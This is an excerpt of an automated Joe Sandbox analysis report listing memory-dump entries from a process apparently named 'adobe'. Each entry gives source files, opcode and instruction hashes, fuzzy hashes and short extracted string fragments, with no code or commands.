                        • Instruction Fuzzy Hash: B301B132B101155FDF94DA68DC10BABBBFB9BC8304F08417AD50AEB344EE659C528BD2
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0ff1ebffd25ab08f559645f4c5b972df12444972019ba2ce696b6e8fd501183
                        • Instruction ID: 5808937c67f75e98bf1236cb1ca401c4ed31c6e1c9ae1be3be3c2d1805ec54f2
                        • Opcode Fuzzy Hash: e0ff1ebffd25ab08f559645f4c5b972df12444972019ba2ce696b6e8fd501183
                        • Instruction Fuzzy Hash: 9311A2B5D01259AFCB00DF9AD984ADEFBB4FB48314F10812AE518B7340C374A954CFA5
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6857a99b60517640e26b5212fada1f8240faffade571a0a74670fa431c12ae2a
                        • Instruction ID: 671ce848cae30e14f5003d6bedac71d46639953180b43b283c9f309484d9d270
                        • Opcode Fuzzy Hash: 6857a99b60517640e26b5212fada1f8240faffade571a0a74670fa431c12ae2a
                        • Instruction Fuzzy Hash: E4018135B001105BDB649AAED85072BF2DBDBCA711F24843AE60EC7344DEA2EC0247A5
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2502bb0ff474411d0c74dbfaae4a322a8d1572c8bbea3daa433b0265f865f818
                        • Instruction ID: 1ed5a34950235c780938549094cbf1c2d6d80716953273dc16fe7fdc3308e4dc
                        • Opcode Fuzzy Hash: 2502bb0ff474411d0c74dbfaae4a322a8d1572c8bbea3daa433b0265f865f818
                        • Instruction Fuzzy Hash: 93018C71B001101BDB64A56DE85073EA3DBDBCA624F54883AE10ECB340EE71EC424796
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 467664bd63d4612fbc24a56fb85a223c2a4ffc91889d5015b78790200b3e32aa
                        • Instruction ID: b0ae909ce3910bec667e1ae2eb57da6a9de75bba3374d8fb7b321deea16d87ed
                        • Opcode Fuzzy Hash: 467664bd63d4612fbc24a56fb85a223c2a4ffc91889d5015b78790200b3e32aa
                        • Instruction Fuzzy Hash: EE01A430B005155FDB60EEFDD85072EB3D6EB8A714F14883AE50ACB344DE22EC528B81
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57d1625c2cf32037152d155a892b362e123430d574a845778945ec20ee3dee8f
                        • Instruction ID: 6455985592c45de7c69943c105db972063009ffb5861d91e75eddd9854dcb589
                        • Opcode Fuzzy Hash: 57d1625c2cf32037152d155a892b362e123430d574a845778945ec20ee3dee8f
                        • Instruction Fuzzy Hash: 8EF0A0719093889FCB61CF78C99575A7FEDEB03210F2984E9D085CB202D636CE02CB62
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2222239885
                        • Opcode ID: f662e1f473e3a4778a48ca780e2488f88f13d664187ac9daafb94f978933395e
                        • Instruction ID: 4d6bdc05671d0baf24cc6f89871e885929b693b3a08fa930baac7653d548f208
                        • Opcode Fuzzy Hash: f662e1f473e3a4778a48ca780e2488f88f13d664187ac9daafb94f978933395e
                        • Instruction Fuzzy Hash: E0122D34E007198FDB68DF65C954A9DBBF2BF88704F2085A9D40AAB355DB309D86CF81
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: c77c8de3e06c6cf61f1a3a54072af61da2b827032132ab25c666750ab00bd258
                        • Instruction ID: cf74e5f206ba52d4cc551c48b557de48f5bb40f65904355620db8e233f4ae8b3
                        • Opcode Fuzzy Hash: c77c8de3e06c6cf61f1a3a54072af61da2b827032132ab25c666750ab00bd258
                        • Instruction Fuzzy Hash: 21914C30A003099FDB64DFA5DA54BAEBBF2AF84304F10852AE402AB355DB759D85CF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-390881366
                        • Opcode ID: 0e9c08814a0905e616fdf2ebf7d6e578fd69d9395abee5d9270f2c6ec885cd61
                        • Instruction ID: d2c61fc5104ea72f82b63c7b5909f379f4dfc8a64bde60a7f4c79355bf12b4b2
                        • Opcode Fuzzy Hash: 0e9c08814a0905e616fdf2ebf7d6e578fd69d9395abee5d9270f2c6ec885cd61
                        • Instruction Fuzzy Hash: 99F12C34B00308DFDB58EF64D594A6EBBB2BF84304F248569E4059B369DB75EC82CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 3d80f32d057ab0b6ce5b5dcbf85ea03b8393eb1f1aaa020350aecabc9e583a33
                        • Instruction ID: 312e7f7d2d5f0af36b82ece2d862d103757a2e6764e430f615f4c7ee35bc7988
                        • Opcode Fuzzy Hash: 3d80f32d057ab0b6ce5b5dcbf85ea03b8393eb1f1aaa020350aecabc9e583a33
                        • Instruction Fuzzy Hash: 5FB1FB30E102088FDB58EFA9D99469EB7B2EF84304F248969D406DB355DB75DC86CF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR^q$LR^q$$^q$$^q
                        • API String ID: 0-2454687669
                        • Opcode ID: 07b0b6d78e754c8f94a9ed6d9d3f4c60cc2179e6f9a7b9463aa8ca656c801210
                        • Instruction ID: 8ec69ddffb790093b7cc6468d4d1bda1f961c8d5cbe5dd51710f11339cfdecce
                        • Opcode Fuzzy Hash: 07b0b6d78e754c8f94a9ed6d9d3f4c60cc2179e6f9a7b9463aa8ca656c801210
                        • Instruction Fuzzy Hash: 5D518E34B002059FDB58EB68C950A6AB7E6FF89704F14856DE406DB3AADB30EC45CF91
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 1dcd159880c649a736d29e24aa45d90faf162474f91139fad9ec1ef601787d41
                        • Instruction ID: 39442f9354ad738e9f1ff7aeef179b58b676fad0a633cac6fa88740e8b408867
                        • Opcode Fuzzy Hash: 1dcd159880c649a736d29e24aa45d90faf162474f91139fad9ec1ef601787d41
                        • Instruction Fuzzy Hash: 4D515E30E103049FDF69EBA8D5806AEB7B2EB85715F24852AD846DB355DB31EC81CF90